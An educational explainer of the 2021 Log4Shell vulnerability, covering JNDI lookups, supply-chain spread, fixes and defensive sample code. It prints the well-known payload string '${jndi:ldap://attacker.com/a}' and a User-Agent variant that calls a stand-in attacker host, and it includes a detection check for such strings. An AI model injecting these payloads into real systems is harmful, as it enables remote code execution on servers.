Log4Shell: How a Logging Library Became the Internet's Worst Day

Picture the on-call engineer at a large company on the evening of Friday the 10th of December 2021. Their phone lights up. Then it lights up again. Within an hour, security teams all over the world are cancelling their weekends, dialling into emergency calls, and asking the same frightened question: are we running Log4j, and if so, where? The cause of the chaos was not a glamorous zero-day in an operating system or a clever new class of attack. It was a humble logging library, Apache Log4j, that quietly evaluated text it was only ever meant to write down. This is a breakdown of Log4Shell: how it worked, why it was everywhere, and the lesson it left behind.

Credit and scope

Log4Shell was discovered by Chen Zhaojun of the Alibaba Cloud Security Team, who reported it responsibly to Apache. This is my explainer of how the flaw worked, not original research. It is written for defenders and learners.

First, what is a logging library?

Before we get to the bug, let us set the scene in plain language. A logging library is a piece of code that applications use to write down what they are doing. Every time a website handles a request, an error occurs, or a user signs in, the application usually records a line of text somewhere so that humans can read it later. Think of it as the application keeping a diary.

Log4j is one of the most popular logging libraries in the Java world. Java is a programming language used to build an enormous amount of business software, from banking systems to online games to the servers behind mobile apps. If you wrote Java, you very likely reached for Log4j to handle your diary keeping. That popularity is a big part of the story.

The one feature that caused it all

Somewhere along the way, Log4j gained a feature that sounded helpful: message lookups. The idea was that a log message could contain a special placeholder written as ${...}, and Log4j would expand it, substituting in a value. It is a bit like a word processor's mail merge, where ${name} in a template gets replaced with the real name before the letter is printed.

That convenience feature was flexible. Too flexible. One of the lookups it supported was JNDI, which stands for the Java Naming and Directory Interface. JNDI is a way for Java programs to fetch objects and data from remote services over network protocols like LDAP, a directory protocol often used inside company networks. Put those two facts side by side and you have the whole vulnerability in a single line:

${jndi:ldap://attacker.com/a}

If that string ended up inside a log message, Log4j would treat it as an instruction rather than plain text. It would reach out over the network to attacker.com, fetch a Java object, and load it into the running application. Here is the fatal part: loading an attacker-controlled Java class means running attacker-controlled code. That is remote code execution, one of the most severe outcomes in security, triggered by nothing more than writing a line of text to a log.
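To make the mechanism concrete, here is a minimal sketch of placeholder expansion in plain Java. It is a toy model, not Log4j's code: the class name ToyLookupExpander, the "upper" lookup, and the stand-in "jndi" lookup are all invented for illustration, and nothing in it touches the network. The stand-in only records the URL it was asked to fetch, which is enough to show that the text being logged decides which lookup runs.

```java
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.function.Function;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/** Toy model of message lookups. Not Log4j code; nothing here contacts a server. */
final class ToyLookupExpander {
    // Matches ${prefix:argument}, for example ${upper:alice} or ${jndi:ldap://host/a}.
    private static final Pattern LOOKUP = Pattern.compile("\\$\\{([a-z]+):([^}]*)\\}");

    private final Map<String, Function<String, String>> lookups;

    ToyLookupExpander(Map<String, Function<String, String>> lookups) {
        this.lookups = lookups;
    }

    /** Replaces every recognised placeholder with whatever its lookup returns. */
    String expand(String message) {
        return LOOKUP.matcher(message).replaceAll(match -> {
            Function<String, String> lookup = lookups.get(match.group(1));
            // Placeholders with an unknown prefix are left exactly as written.
            String value = (lookup == null) ? match.group() : lookup.apply(match.group(2));
            return Matcher.quoteReplacement(value);
        });
    }

    public static void main(String[] args) {
        List<String> wouldFetch = new ArrayList<>();
        Map<String, Function<String, String>> table = new HashMap<>();
        table.put("upper", s -> s.toUpperCase());
        // Stand-in for the JNDI lookup: it records the URL instead of contacting it.
        table.put("jndi", url -> { wouldFetch.add(url); return "<remote object>"; });

        ToyLookupExpander expander = new ToyLookupExpander(table);
        System.out.println(expander.expand("User signed in: ${upper:alice}"));
        System.out.println(expander.expand("User-Agent: ${jndi:ldap://attacker.com/a}"));
        System.out.println("Lookups that would have gone to the network: " + wouldFetch);
    }
}
```

The point of the sketch is the shape of the problem: the expander cannot tell a placeholder the developer wrote from one that arrived inside a username or a header. Whoever controls the text controls the lookup.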

What remote code execution means

Remote code execution, often shortened to RCE, means an attacker can run their own commands on your machine over the network without ever sitting in front of it. It is the digital equivalent of a stranger being able to reach through your front door and use your kitchen. Once someone can run code on a server, they can usually read its data, install more tools, and move deeper into the network.

Why logging anything was dangerous

Here is what turned a strange feature into a global catastrophe. Applications log untrusted input all the time as a matter of routine. They log usernames, search queries, error messages, and HTTP headers such as the User-Agent string that your browser sends with every request. They log chat messages, form fields, and file names. Anywhere an application recorded something that an attacker could influence, the attacker could smuggle in the magic string.

Attacker sets header:    User-Agent: ${jndi:ldap://attacker.com/x}
Server logs the header ->  Log4j expands it  ->  server fetches and runs attacker code

There was no login required and no special access needed. If you could get your text logged, and almost everything gets logged, you could potentially take over the server. The examples that circulated in the first days were almost comical. People discovered they could trigger the flaw by renaming their iPhone, by typing the string into a game's chat box, or by putting it in a field on a web form. In each case the target system dutifully wrote the string to a log, and Log4j did the rest.
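For defenders triaging requests or old logs, a first-pass check can be as simple as asking which untrusted fields contain placeholder syntax at all. The sketch below is an illustration under stated assumptions, not a complete detector: the class and method names are hypothetical, and it deliberately flags any "${" rather than the literal text "jndi", because placeholders can be nested and attackers used that to disguise the word. Expect false positives, and treat a hit as a reason to look closer rather than as proof of an attack.

```java
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import java.util.TreeMap;

/** Hypothetical triage helper: flags untrusted fields that contain ${...} syntax. */
final class LookupSyntaxTriage {
    /** True if the value contains the opening of any ${...} placeholder. */
    static boolean containsLookupSyntax(String value) {
        return value != null && value.contains("${");
    }

    /** Returns the names of the fields whose values contain lookup syntax, sorted by name. */
    static List<String> suspiciousFields(Map<String, String> fields) {
        List<String> hits = new ArrayList<>();
        for (Map.Entry<String, String> entry : new TreeMap<>(fields).entrySet()) {
            if (containsLookupSyntax(entry.getValue())) {
                hits.add(entry.getKey());
            }
        }
        return hits;
    }

    public static void main(String[] args) {
        // Example request fields; the header values are made up for the demonstration.
        Map<String, String> request = new LinkedHashMap<>();
        request.put("User-Agent", "${jndi:ldap://attacker.com/x}");
        request.put("Accept-Language", "en-GB");
        request.put("username", "alice");
        System.out.println("Fields to inspect: " + suspiciousFields(request));
    }
}
```

A check like this is a triage aid only. It does nothing to make a vulnerable Log4j safe, which is why the fixes further down focus on the library itself.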

To understand why this felt so different from a normal bug, walk through the two stages of the attack. In the first stage, the attacker plants the string and the server sends an outbound request to a machine the attacker controls. In the second stage, that attacker machine answers back with a malicious Java class, which the server downloads and runs. The victim's own server does the heavy lifting. It reaches out, collects the payload, and executes it, all because it was trying to be helpful with a log entry.

Why the blast radius was the whole internet

Log4j is one of the most widely used Java libraries in existence, buried deep inside countless applications and appliances as a dependency of a dependency. Many teams did not even know they were running it. That is what turned one bug into an industry-wide emergency. The vulnerability, tracked as CVE-2021-44228, received the maximum CVSS score of 10.0.

Dependency of a dependency, explained

That phrase, a dependency of a dependency, deserves unpacking because it is the heart of the story. When you build software today, you rarely write everything yourself. You pull in libraries written by other people to save time. Those libraries pull in their own libraries, which pull in more again. The result is a deep stack of components, most of which you never chose directly and may never have heard of.

Imagine ordering a coffee. You chose the cafe, but you did not choose the farm that grew the beans, the mill that processed them, or the trucking company that delivered them. If one of those hidden suppliers had a problem, your coffee is affected even though you never dealt with them. Log4j sat several suppliers deep in millions of software supply chains. A team might have installed a single well-known product, unaware that somewhere inside it, three or four layers down, sat a copy of Log4j waiting to be triggered.

This is why the first question on every emergency call was not "how do we fix it" but "where even is it". You cannot patch what you cannot find.
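Answering "where even is it" is, at heart, a search through a dependency graph. The sketch below shows the idea with a depth-first search over a small hand-written graph. Every product and library name except log4j-core is invented, and the class DependencyPathFinder is hypothetical. In a real build you would get the graph from your build tool's dependency report rather than typing it in.

```java
import java.util.ArrayDeque;
import java.util.ArrayList;
import java.util.Deque;
import java.util.HashMap;
import java.util.HashSet;
import java.util.List;
import java.util.Map;
import java.util.Set;

/** Hypothetical helper: finds one chain of dependencies leading from a product to a library. */
final class DependencyPathFinder {
    /** Returns one path from root to target, or an empty list if target is unreachable. */
    static List<String> findPath(Map<String, List<String>> graph, String root, String target) {
        Deque<String> path = new ArrayDeque<>();
        boolean found = search(graph, root, target, path, new HashSet<>());
        return found ? new ArrayList<>(path) : List.of();
    }

    private static boolean search(Map<String, List<String>> graph, String node, String target,
                                  Deque<String> path, Set<String> visited) {
        if (!visited.add(node)) {
            return false; // already explored; this also guards against cycles
        }
        path.addLast(node);
        if (node.equals(target)) {
            return true;
        }
        for (String dependency : graph.getOrDefault(node, List.of())) {
            if (search(graph, dependency, target, path, visited)) {
                return true;
            }
        }
        path.removeLast(); // dead end: back out of this node
        return false;
    }

    public static void main(String[] args) {
        // Made-up dependency graph: each key lists the libraries it pulls in directly.
        Map<String, List<String>> graph = new HashMap<>();
        graph.put("my-app", List.of("web-framework", "report-tool"));
        graph.put("report-tool", List.of("pdf-engine"));
        graph.put("pdf-engine", List.of("log4j-core"));

        // prints [my-app, report-tool, pdf-engine, log4j-core]
        System.out.println(findPath(graph, "my-app", "log4j-core"));
    }
}
```

Notice that my-app never mentions log4j-core itself. It arrives three layers down, which is exactly the situation many teams discovered that weekend.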

Fixing it

The immediate response came in layers as understanding improved. Nobody got it perfectly right on the first attempt, which is itself a useful lesson about incident response under pressure.

Update Log4j. Version 2.15.0 disabled message lookups by default, 2.16.0 removed message lookups entirely and disabled JNDI by default, and the 2.17.x line fixed a follow-up denial of service issue that emerged as researchers kept digging. Getting onto a current release is the real fix, not a workaround.
Remove the vulnerable class. Where updating quickly was impossible, teams stripped the JndiLookup class out of the packaged jar file as a stopgap. If the dangerous component is not present, it cannot be abused.
Block outbound connections. Egress filtering, which means controlling what a server is allowed to connect out to, breaks the second stage of the attack. If the server cannot reach the attacker's machine to fetch the malicious class, the exploit stalls even when the string gets logged.
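Before stripping the JndiLookup class out of a jar, you first have to know which jars contain it. A jar is a zip archive, so a few lines of standard-library Java can check. This is a minimal sketch, assuming the class sits at its usual path inside log4j-core; the scanner class name is hypothetical, and it only looks at the top level of each file, so copies nested inside a larger archive such as a fat jar or a WAR would be missed.

```java
import java.io.IOException;
import java.nio.file.Path;
import java.util.zip.ZipFile;

/** Hypothetical scanner: reports whether a jar contains the JndiLookup class. */
final class JndiLookupScanner {
    // Location of the JndiLookup class inside a log4j-core jar.
    static final String JNDI_LOOKUP_ENTRY =
            "org/apache/logging/log4j/core/lookup/JndiLookup.class";

    /** True if the archive has a top-level entry for JndiLookup. Nested jars are not opened. */
    static boolean containsJndiLookup(Path jar) throws IOException {
        try (ZipFile zip = new ZipFile(jar.toFile())) {
            return zip.getEntry(JNDI_LOOKUP_ENTRY) != null;
        }
    }

    public static void main(String[] args) throws IOException {
        if (args.length == 0) {
            System.out.println("usage: java JndiLookupScanner.java <jar> [<jar> ...]");
            return;
        }
        for (String arg : args) {
            Path jar = Path.of(arg);
            String verdict = containsJndiLookup(jar) ? "JndiLookup present" : "JndiLookup not found";
            System.out.println(jar + ": " + verdict);
        }
    }
}
```

A "not found" result from a scan like this is weaker evidence than it looks, for the nesting reason above. It narrows the search; it does not end it.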

Workarounds are not the finish line

Several early mitigations that people relied on turned out to be incomplete, including the log4j2.formatMsgNoLookups system property, which was supposed to switch lookups off. Stopgaps buy time, and buying time under this kind of pressure is valuable, but they are not a substitute for actually updating the library. Treat a workaround as a way to get to Monday, not as the end of the job.

The real lesson: you run code you have never seen

Log4Shell was not really about one feature. It was about the modern reality that every application is a tower of dependencies, and a flaw in one obscure layer at the bottom becomes everyone's problem at the top. The convenience feature was the trigger, but the true cause was that the entire industry had built on shared foundations without keeping track of what those foundations were.

The takeaways outlived the bug:

Know what you ship. A software bill of materials, which is simply a full inventory of every component and version inside your product, is what lets you answer "are we affected" in minutes instead of days. During Log4Shell, the teams with an accurate inventory slept. The teams without one spent the weekend grepping through servers by hand.
Assume dependencies will fail. Egress filtering and least privilege, which means giving each process only the access it truly needs, limit the damage when, not if, a component turns out to be exploitable. Defence in depth is what stands between one bad library and a full breach.
Patch paths matter. The teams that recovered fastest were the ones who could roll an updated dependency out quickly and everywhere. If pushing a new version of a library takes weeks in normal times, it will take weeks during an emergency too.
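Here is roughly what "answering in minutes" looks like once an inventory exists. The sketch below assumes the inventory has already been flattened into rows of product, component, and version. The product names, the class InventoryCheck, and the minimum version passed in are all illustrative choices, and the comparison only handles plain dotted numeric versions, so a pre-release label such as "2.0-beta9" would need extra handling.

```java
import java.util.ArrayList;
import java.util.List;

/** Hypothetical inventory query: which products ship a component older than a given version? */
final class InventoryCheck {
    /** One row of a flattened inventory. */
    static final class Component {
        final String product;
        final String name;
        final String version;

        Component(String product, String name, String version) {
            this.product = product;
            this.name = name;
            this.version = version;
        }
    }

    /** Compares dotted numeric versions part by part, so "2.9.1" sorts before "2.17.1". */
    static int compareVersions(String a, String b) {
        String[] left = a.split("\\.");
        String[] right = b.split("\\.");
        for (int i = 0; i < Math.max(left.length, right.length); i++) {
            int l = i < left.length ? Integer.parseInt(left[i]) : 0;
            int r = i < right.length ? Integer.parseInt(right[i]) : 0;
            if (l != r) {
                return Integer.compare(l, r);
            }
        }
        return 0;
    }

    /** Returns, in inventory order, the products whose copy of the component is below the minimum. */
    static List<String> needingUpdate(List<Component> inventory, String componentName, String minimum) {
        List<String> products = new ArrayList<>();
        for (Component c : inventory) {
            if (c.name.equals(componentName) && compareVersions(c.version, minimum) < 0) {
                products.add(c.product);
            }
        }
        return products;
    }

    public static void main(String[] args) {
        // Made-up inventory rows for illustration.
        List<Component> inventory = List.of(
                new Component("billing-service", "log4j-core", "2.14.1"),
                new Component("search-appliance", "log4j-core", "2.17.1"),
                new Component("intranet-wiki", "log4j-core", "2.9.1"),
                new Component("billing-service", "some-json-lib", "1.4.0"));

        // prints [billing-service, intranet-wiki]
        System.out.println(needingUpdate(inventory, "log4j-core", "2.17.1"));
    }
}
```

The numeric comparison matters more than it might seem. Compared as plain text, "2.9.1" would sort after "2.17.1" and the oldest copy in the list would be reported as safe.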

If you enjoy this style of "one small thing caused a global mess" story, two other classics are worth your time. Heartbleed shows how a single missing length check leaked private keys straight out of server memory, and Shellshock shows how a decades-old feature in a common shell became instant remote code execution. All three share the same underlying theme, which is what makes them such good teachers.

The takeaway

Log4Shell turned an innocent convenience feature into remote code execution, and a ubiquitous dependency turned that into a global incident. The immediate fix was to update Log4j, but the lasting lesson is bigger. You are responsible for code you never wrote and often cannot see, so the job is to know your dependencies, contain them with layered defences, and be able to patch them fast, all before one of them surprises you on a Friday night.